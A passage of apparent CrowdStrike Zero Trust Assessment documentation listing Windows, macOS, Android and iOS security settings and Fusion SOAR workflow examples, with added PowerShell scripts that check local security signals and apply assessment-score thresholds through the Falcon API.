This setting checks whether the host is registered in the Windows Insider Program (WIP). WIP is an open software testing program by Microsoft. It allows users who own a valid license of Windows to register for pre-release builds of the operating system that were previously accessible only to software developers. This ZTA assessment item checks whether the host is enrolled in the program. The separate Windows Insider Program Running assessment item checks whether the host is actually running an Insider build.

Disabled

Hypervisor Code Integrity

Hypervisor Code Integrity (HVCI), also called Memory Integrity in Windows Security and previously marketed as part of Device Guard, runs the kernel-mode code integrity checks inside the virtualization-based security environment rather than in the NT kernel. Because the hypervisor enforces that kernel memory is never both writable and executable and that only verified code runs in kernel mode, HVCI protects against kernel-mode code injection even when the NT kernel itself is compromised.

Enabled

Hypervisor Code Integrity (Strict Mode)

This is an additional layer of security for Hypervisor Code Integrity. If HVCI is active, then Strict Mode is enabled by default. If HVCI is enabled but Strict Mode is disabled, then something may have occurred to disable it.

Enabled

Extended Validation Mode

Extended Validation Mode requires all drivers to be signed with an Extended Validation (EV) code signing certificate. A certificate authority (CA) issues an EV certificate only after extended vetting of the publisher's identity, and the certificate's private key must be kept on a hardware token, so an EV signature gives stronger assurance of who signed the driver than a standard certificate does. Rather than a single toggle, EV mode is a consequence of many different settings being enabled, in addition to OS and firmware support for them. For a host to be in EV mode, the machine's OS and firmware need to support virtualization-based security features and both KMCI and HVCI must be enabled. Make sure your hosts can support these settings by testing them on a controlled group prior to any mass rollout. For more info, see the Microsoft article Windows 10 Device Guard and Credential Guard Demystified.

Enabled

Script Enforcement

Script Enforcement, a Windows Defender Application Control (WDAC) option, blocks unsigned or unauthorized PowerShell scripts from running on the host and restricts interactive PowerShell to Constrained Language mode, so that unapproved code cannot use the full language.

Enabled

Branch Target Injection Mitigation

This requirement monitors whether mitigations are in place to defend against branch target injection (CVE-2017-5715).

Active

Branch Target Injection Mitigation Registry Status

This requirement is based on the registry status for mitigations required to prevent branch target injection. The status for these mitigations must not be disabled in the registry.

Not disabled in the registry

Branch Target Injection Mitigation Hardware Support

This requirement determines if the host’s hardware supports the mitigations required to prevent branch target injection.

Supported by hardware

Branch Target Injection Mitigation Patch

This requirement ensures the host has applied the relevant patches to prevent branch target injection.

System patched against CVE-2017-5715

Rogue Data Cache Load Mitigation

This requirement ensures mitigations are in place to defend against Rogue Data Cache Load (CVE-2017-5754).

Enabled

Rogue Data Cache Load Patch

This requirement ensures the host has applied the relevant patches to prevent Rogue Data Cache Load.

System patched against CVE-2017-5754

L1 Terminal Fault Mitigation

This requirement ensures mitigations are in place to defend against L1 Terminal Fault (CVE-2018-3620).

Enabled

Speculative Store Bypass Mitigation Available

This requirement ensures the host’s OS contains the mitigation for Speculative Store Bypass (CVE-2018-3639). Speculative Store Bypass Mitigation Hardware Support must be enabled.

Active

Speculative Store Bypass Mitigation Hardware Support

This requirement ensures the host’s hardware supports the mitigation for Speculative Store Bypass, CVE-2018-3639, and that it is automatically enabled by the OS.

Supported by hardware
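The Windows items above are reported by the Falcon sensor, but a practitioner will often want to read the same signals directly on a host, for example to understand why an item fails before a rollout. The following script is an added example, not CrowdStrike code: it reads the host-side signals behind most of the Windows ZTA items using built-in tools (the Win32_DeviceGuard WMI class, Confirm-SecureBootUEFI, bcdedit, the firmware_type environment variable) plus the SpeculationControl module from the PowerShell Gallery for the CVE items, and compares them with the requirements in the table. The value-to-name mappings are Microsoft's documented meanings for the Win32_DeviceGuard arrays. Items that have no simple local query here (HSTI, EV mode, the Windows Insider checks) are left out. Run it from an elevated PowerShell session.

```powershell
# Added example (not CrowdStrike code): read the host-side signals behind the
# Windows ZTA OS settings and compare them with the ZTA requirements.
# Assumes: elevated session, and optionally the SpeculationControl module
# (Install-Module SpeculationControl) for the CVE-related items.
#Requires -RunAsAdministrator

# Win32_DeviceGuard.AvailableSecurityProperties members (Microsoft-documented meanings)
$AvailableProps = @{
    1 = 'Hypervisor support'       # needed for VSM / VBS
    2 = 'Secure Boot'
    3 = 'DMA protection'           # Kernel DMA Protection (IOMMU in use)
    4 = 'Secure Memory Overwrite'  # Secure MOR
    5 = 'NX protections'
    6 = 'SMM mitigations'          # SMM Protections
    7 = 'MBEC/GMET'                # Mode Based Execution Control
}
# Win32_DeviceGuard.SecurityServicesRunning members
$RunningServices = @{
    1 = 'Credential Guard'
    2 = 'HVCI'
    3 = 'System Guard Secure Launch'
    4 = 'SMM Firmware Measurement'
}

function Get-ZtaWindowsSignals {
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard

    # Windows exposes the boot firmware type as 'UEFI' or 'Legacy' (CSM)
    $firmwareType = $env:firmware_type
    # Confirm-SecureBootUEFI throws on a legacy-BIOS boot, which also means Secure Boot is off
    $secureBoot = $false
    try { $secureBoot = [bool](Confirm-SecureBootUEFI) } catch { }

    # Boot-configuration flags that ZTA requires to be off
    $bcd = bcdedit /enum '{current}' 2>$null
    $testSigning = [bool]($bcd -match '^\s*testsigning\s+Yes')
    $debugMode   = [bool]($bcd -match '^\s*debug\s+Yes')

    # Speculative-execution mitigations; stays $null if the module is not installed
    $spec = $null
    if (Get-Command Get-SpeculationControlSettings -ErrorAction SilentlyContinue) {
        $spec = Get-SpeculationControlSettings -Quiet
    }

    [pscustomobject]@{
        FirmwareType           = $firmwareType
        SecureBoot             = $secureBoot
        VbsStatus              = @('Not enabled', 'Enabled, not running', 'Running')[[int]$dg.VirtualizationBasedSecurityStatus]
        AvailableProperties    = @($dg.AvailableSecurityProperties | ForEach-Object { $AvailableProps[[int]$_] })
        RunningServices        = @($dg.SecurityServicesRunning    | ForEach-Object { $RunningServices[[int]$_] })
        CredentialGuardRunning = [bool]($dg.SecurityServicesRunning -contains 1)
        HvciRunning            = [bool]($dg.SecurityServicesRunning -contains 2)
        TestSigning            = $testSigning
        DebugMode              = $debugMode
        BtiMitigation          = $(if ($spec) { $spec.BTIWindowsSupportEnabled }            else { 'unknown' })  # CVE-2017-5715
        RdclMitigation         = $(if ($spec) { $spec.KVAShadowWindowsSupportEnabled }      else { 'unknown' })  # CVE-2017-5754
        L1tfMitigation         = $(if ($spec) { $spec.L1TFWindowsSupportEnabled }           else { 'unknown' })  # CVE-2018-3620
        SsbdMitigation         = $(if ($spec) { $spec.SSBDWindowsSupportEnabledSystemWide } else { 'unknown' })  # CVE-2018-3639
    }
}

# Compare the signals with the ZTA requirements and return one object per failing item
function Test-ZtaWindowsSignals {
    param([Parameter(Mandatory)] $Signals)
    $expect = [ordered]@{
        'UEFI boot mode'            = ($Signals.FirmwareType -eq 'UEFI')
        'Secure Boot'               = $Signals.SecureBoot
        'Virtual Secure Mode (VSM)' = ($Signals.VbsStatus -ne 'Not enabled')
        'Secure MOR'                = ($Signals.AvailableProperties -contains 'Secure Memory Overwrite')
        'SMM Protections'           = ($Signals.AvailableProperties -contains 'SMM mitigations')
        'Memory Access Protection'  = ($Signals.AvailableProperties -contains 'DMA protection')
        'MBEC'                      = ($Signals.AvailableProperties -contains 'MBEC/GMET')
        'Credential Guard'          = $Signals.CredentialGuardRunning
        'Hypervisor Code Integrity' = $Signals.HvciRunning
        'Test Signing disabled'     = (-not $Signals.TestSigning)
        'Debug Mode disabled'       = (-not $Signals.DebugMode)
        'BTI mitigation'            = ($Signals.BtiMitigation  -eq $true)  # 'unknown' counts as a failure
        'RDCL mitigation'           = ($Signals.RdclMitigation -eq $true)
        'L1TF mitigation'           = ($Signals.L1tfMitigation -eq $true)
        'SSB mitigation'            = ($Signals.SsbdMitigation -eq $true)
    }
    foreach ($name in $expect.Keys) {
        if (-not $expect[$name]) { [pscustomobject]@{ Item = $name; Status = 'FAIL' } }
    }
}

$signals = Get-ZtaWindowsSignals
$signals | Format-List
$failures = @(Test-ZtaWindowsSignals $signals)
if ($failures.Count -gt 0) { $failures | Format-Table -AutoSize } else { 'All checked ZTA items pass' }
```

The script treats a missing SpeculationControl module as a failure of the four CVE items rather than silently passing them, which mirrors how ZTA marks an item it cannot evaluate as non-compliant. The mapping from Win32_DeviceGuard values to ZTA item names is an interpretation for illustration; the sensor's own evaluation is authoritative.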

macOS security settings
Note: These macOS security settings require a minimum version of Falcon sensor for Mac. If a host does not meet this requirement, the status of the applicable assessment item is Unknown and the host is assessed as non-compliant.
OS security setting Description ZTA requirement Falcon sensor minimum requirement

FileVault

FileVault is Apple's full-disk encryption. When FileVault is enabled, the entire startup volume is encrypted and can be unlocked only with an authorized user's password or the recovery key. Even if the device is stolen, the data on it remains unreadable without those credentials.

Enabled

6.33

Remote Login

Disabling Remote Login prevents access to the device using Secure Shell (SSH) and admin credentials.

Disabled

6.33

Gatekeeper

Protects the device from launching malicious applications by enforcing code signing and limiting the sources that applications can be downloaded from. On macOS 10.15 and later, Gatekeeper also performs a malicious content scan and signature validation periodically to check that code has not been tampered with.

Enabled

6.33

Stealth Mode

Stealth Mode makes macOS drop unsolicited Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) packets sent to closed ports and ignore ICMP probes such as ping, so the host does not respond to network discovery attempts.

Enabled

6.33

System Integrity Protection (SIP)

System Integrity Protection (SIP) prevents even the root user from modifying protected system files and directories or from attaching a debugger to protected system processes at runtime. Enabling SIP removes a common path for malware to tamper with the system or inject code into protected processes.

Enabled

6.33

Internet Sharing

Internet Sharing allows a Mac device to share a network connection with other devices.

Disabled

6.33

Analytics & Improvements

Analytics & Improvements automatically collects diagnostics information, captured audio, crash logs, and more in order to help Apple and other third-party vendors improve their solutions.

Disabled

6.33

Application Firewall

Application Firewall controls incoming network connections on a per-application basis rather than per port, so that only the applications you have allowed (and signed system services) can accept inbound connections.

Enabled

6.39

System Full Disk Access

System Full Disk Access allows selected apps to access data from Mail, Messages, Safari, Home, Time Machine backups, and certain administrative settings for all users on the device. This setting should be disabled for everything except CrowdStrike apps.

Important: If this setting is controlled by a mobile device management solution (MDM), ZTA only monitors changes made by MDM and does not monitor changes made manually on the host in Security & Privacy system preferences. Additionally, if you manage FDA using an MDM profile, the host’s System Preferences might not accurately reflect the current setting.

Disabled for all but CrowdStrike apps

6.39

CrowdStrike Full Disk Access

CrowdStrike Full Disk Access allows CrowdStrike apps to access necessary data, info, and certain administrative settings on the device. For more info, see Falcon sensor for Mac.

Important: If this setting is controlled by a mobile device management solution (MDM), ZTA only monitors changes made by MDM and does not monitor changes made manually on the host in Security & Privacy system preferences. Additionally, if you manage FDA using an MDM profile, the host’s System Preferences might not accurately reflect the current setting.

Enabled for CrowdStrike apps

6.39

Android OS security settings
OS security setting Description ZTA requirement
App side loading

One or more apps other than the Google Play Store have been given permission to install other apps.

False

Bootloader unlocked

The bootloader of the device is unlocked.

False

Developer options enabled

Developer Options is enabled in the system Settings app.

False

Falcon app trusted

The version of the CrowdStrike Falcon app communicating with the cloud is legitimate.

True

Google Play Protect enabled

The user has not disabled Google Play Protect, which scans installed apps on the device.

True

Key store trusted

If the key store is not trusted, cryptographic operations managed by the device might not be secure.

True

Lock screen set

A lock screen is required to prevent unauthorized use of the device by anyone with physical access to it.

True
Device integrity

The device is not rooted. Root access bypasses the built-in security restrictions of the operating system. Attackers can gain easier access to operating system code and resources, and take over the device.

Intact
SELinux enabled

If the SELinux module is disabled, the device is more vulnerable to apps violating Android's access control policy and to privilege escalation attacks.

Enforced

Storage encrypted

Encryption protects the sensitive data on your phone by storing it in an unreadable form.

True

Verified boot state

Android Verified Boot (AVB) is able to trust the integrity and authenticity of the system's boot stages.

True

VPN status

The Falcon for Mobile VPN monitors and protects network traffic.

Enabled
iOS OS security settings
OS security setting Description ZTA requirement
Jailbroken

Checks if the device is jailbroken. Devices that are jailbroken have had built-in security restrictions bypassed and could be compromised.

False

Lockdown mode

Confirms if Lockdown Mode is enabled. Devices that have Lockdown Mode enabled are more secure.

True

Lock screen set

A lock screen is required to prevent unauthorized use of the device by anyone with physical access to it.

True

Network extension type

This setting displays the configuration profile applied to the device. Content Filter profiles provide system-wide network protection. Per-App VPN profiles limit network protection to certain apps.

Content Filter

Integrating ZTA with partner apps

Zero Trust Assessment can be integrated with third-party apps from CrowdStrike partners. Identity Provider (IdP) or Network Access Control (NAC) partners can use the ZTA score of an eligible host to help determine its security posture and leverage that metric as part of their conditional access capabilities.

To enable integration with a CrowdStrike partner, contact Support. For US-GOV-1 and US-GOV-2 customers, contact Support.

Note: These third-party integrations are supported only for Windows, Mac, and Linux hosts.

Zero Trust Assessment workflows

To automate notifications and other Zero Trust Assessment workflows, set up Falcon Fusion SOAR workflows. Use Fusion SOAR triggers, conditions, and actions to define what happens in response to host assessment changes and assessment failures. Build workflows such as the examples listed in this section, or build more complex workflows in Fusion SOAR. For more info about workflows, see Fusion SOAR.

This table shows which workflow actions are available with each ZTA trigger.
Table 1. Available ZTA Triggers
Actions available with both the host assessment change trigger and the aggregate assessment change trigger:
  • Email notification
  • Slack notification
  • MS Teams notification
  • Webhook notification
  • ServiceNow ticket
  • Jira ticket
Actions available only with the host assessment change trigger (they act on a single host):
  • RTR command execution
  • Network containment
Before you begin
  • Use the Overall score trigger type rather than the All subcategory for workflows that trigger on host score changes. This avoids duplicate executions, as the All subcategory triggers for both OS and sensor score changes.
  • For new hosts, assessments could trigger workflows before host details are fully populated, which can result in empty emails and tickets. Use conditions to help alleviate this possibility.
Send notifications on host assessment changes
Set up a workflow to send a notification when a host’s assessment falls below a threshold. Use these triggers, conditions, and actions to send a Slack notification if a host’s OS assessment falls below 80.
  • Trigger: Zero Trust Assessment > Host assessment change > OS score
  • Conditions: OS assessment is less than 80
  • Actions: Notify - Slack
Send notifications and open incidents when assessments fail
Set up a workflow to send a notification and create a ServiceNow ticket when a macOS System Integrity Protection (SIP) assessment fails. Use these triggers, conditions, and actions to send a webhook notification and open a ServiceNow incident when a macOS host fails the SIP assessment:
  • Trigger: Zero Trust Assessment > Host assessment change > Overall score
  • Conditions:
    • Failed assessments include System Integrity Protection (SIP)
    • OS build is equal to macOS
  • Actions:
    • Notify - Call webhook
    • ServiceNow - Create ServiceNow incident

To create a ServiceNow incident as part of a Falcon Fusion SOAR workflow, install the ServiceNow ITSM SOAR Actions plugin from the CrowdStrike store. For more information, see Integrate with ServiceNow.

Send notifications and open incidents on aggregate assessment
Set up a workflow to send a notification and open a ServiceNow incident when the aggregate assessment is computed. Use these triggers, conditions, and actions to send an email notification and create a ServiceNow ticket when the average aggregate assessment falls below 85.
  • Trigger: Zero Trust Assessment > Aggregate assessment
  • Conditions: Average overall assessment is less than 85
  • Actions:
    • Notify - Send email
    • ServiceNow - Create ServiceNow incident
Contain a host automatically
Set up a workflow to automatically contain a host when its sensor assessment falls below a threshold. Use these triggers, conditions, and actions to contain a host if its assessment falls below 75.
  • Trigger: Zero Trust Assessment > Host assessment change > Sensor assessment
  • Conditions: Sensor assessment is less than 75
  • Actions: Contain > Contain device
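Fusion SOAR is the built-in way to act on these thresholds. For testing a threshold policy against real scores before building the workflow, or for driving the same decisions from a script, the same rules can be applied to assessments fetched from the Falcon API. The script below is an added example, not CrowdStrike code: it encodes the three threshold rules from the workflows above (notify when the OS score is below 80, contain when the sensor score is below 75, alert when the average overall score is below 85), runs them first on a constructed sample, and then, only when API credentials are present, on live assessments. The endpoints used are the OAuth2 token endpoint, the Zero Trust Assessment entities endpoint, and the device-actions endpoint with action_name=contain (the API client needs the Zero Trust Assessment: Read and Hosts: Write scopes). The field names aid, assessment.os, assessment.sensor_config and assessment.overall are the ZTA assessment response fields as understood here; confirm them against your cloud's API reference before relying on them.

```powershell
# Added example (not CrowdStrike code): apply the ZTA threshold rules from the
# Fusion SOAR workflow examples to assessment data, with an optional live run.
# Assumptions: the ZTA response shape (aid, assessment.os, assessment.sensor_config,
# assessment.overall); credentials in $env:FALCON_CLIENT_ID / $env:FALCON_CLIENT_SECRET.

function Get-ZtaDecisions {
    param(
        [Parameter(Mandatory)] [object[]] $Assessments,
        [int] $OsNotifyBelow       = 80,   # Send notifications on host assessment changes
        [int] $SensorContainBelow  = 75,   # Contain a host automatically
        [int] $AggregateAlertBelow = 85    # Send notifications and open incidents on aggregate assessment
    )
    $decisions = @(foreach ($a in $Assessments) {
        if ($a.assessment.os -lt $OsNotifyBelow) {
            [pscustomobject]@{ Aid = $a.aid; Action = 'notify';  Reason = "OS score $($a.assessment.os) below $OsNotifyBelow" }
        }
        if ($a.assessment.sensor_config -lt $SensorContainBelow) {
            [pscustomobject]@{ Aid = $a.aid; Action = 'contain'; Reason = "sensor score $($a.assessment.sensor_config) below $SensorContainBelow" }
        }
    })
    # Fleet-level rule: average of the overall scores, like the aggregate assessment trigger
    $avg = ($Assessments | ForEach-Object { $_.assessment.overall } | Measure-Object -Average).Average
    if ($avg -lt $AggregateAlertBelow) {
        $decisions += [pscustomobject]@{ Aid = '*'; Action = 'alert'; Reason = "average overall score $([math]::Round($avg, 1)) below $AggregateAlertBelow" }
    }
    return $decisions
}

function Get-FalconToken {
    param([string] $BaseUrl, [string] $ClientId, [string] $ClientSecret)
    $resp = Invoke-RestMethod -Method Post -Uri "$BaseUrl/oauth2/token" `
        -Body @{ client_id = $ClientId; client_secret = $ClientSecret }
    return $resp.access_token
}

function Get-FalconZtaAssessments {
    param([string] $BaseUrl, [string] $Token, [string[]] $Aids)
    $query = ($Aids | ForEach-Object { "ids=$_" }) -join '&'
    $resp = Invoke-RestMethod -Uri "$BaseUrl/zero-trust-assessment/entities/assessments/v1?$query" `
        -Headers @{ Authorization = "Bearer $Token" }
    return $resp.resources
}

function Invoke-FalconContain {
    param([string] $BaseUrl, [string] $Token, [string[]] $Aids)
    Invoke-RestMethod -Method Post -Uri "$BaseUrl/devices/entities/devices-actions/v2?action_name=contain" `
        -Headers @{ Authorization = "Bearer $Token" } -ContentType 'application/json' `
        -Body (@{ ids = $Aids } | ConvertTo-Json)
}

# Live run against the API; containment happens only with -Enforce (dry run otherwise)
function Invoke-ZtaPolicy {
    param(
        [Parameter(Mandatory)] [string[]] $Aids,          # agent IDs, e.g. from the Hosts API
        [string] $BaseUrl = 'https://api.crowdstrike.com', # use your cloud's API base URL
        [switch] $Enforce
    )
    $token = Get-FalconToken -BaseUrl $BaseUrl -ClientId $env:FALCON_CLIENT_ID -ClientSecret $env:FALCON_CLIENT_SECRET
    $decisions = Get-ZtaDecisions -Assessments (Get-FalconZtaAssessments -BaseUrl $BaseUrl -Token $token -Aids $Aids)
    $decisions | Format-Table -AutoSize
    $toContain = @($decisions | Where-Object Action -eq 'contain' | Select-Object -ExpandProperty Aid)
    if ($toContain.Count -gt 0 -and $Enforce) { Invoke-FalconContain -BaseUrl $BaseUrl -Token $token -Aids $toContain }
}

# Constructed sample in the shape of the ZTA assessment response (not real hosts)
$sample = @(
    [pscustomobject]@{ aid = 'host-a'; assessment = [pscustomobject]@{ os = 96; sensor_config = 80; overall = 88 } }
    [pscustomobject]@{ aid = 'host-b'; assessment = [pscustomobject]@{ os = 72; sensor_config = 90; overall = 81 } }
    [pscustomobject]@{ aid = 'host-c'; assessment = [pscustomobject]@{ os = 90; sensor_config = 60; overall = 75 } }
)
# Expected: host-b -> notify, host-c -> contain, and a fleet alert (average 81.3 < 85)
Get-ZtaDecisions -Assessments $sample | Format-Table -AutoSize

if ($env:FALCON_CLIENT_ID -and $env:FALCON_CLIENT_SECRET) {
    Invoke-ZtaPolicy -Aids @('replace-with-real-aid')   # add -Enforce to actually contain
}
```

Keeping the decision logic in Get-ZtaDecisions, separate from the API calls, is what makes the thresholds testable offline on constructed data; the same separation is worth preserving if you later move the logic into a Fusion SOAR workflow, where the trigger and condition replace this function and the actions replace Invoke-FalconContain.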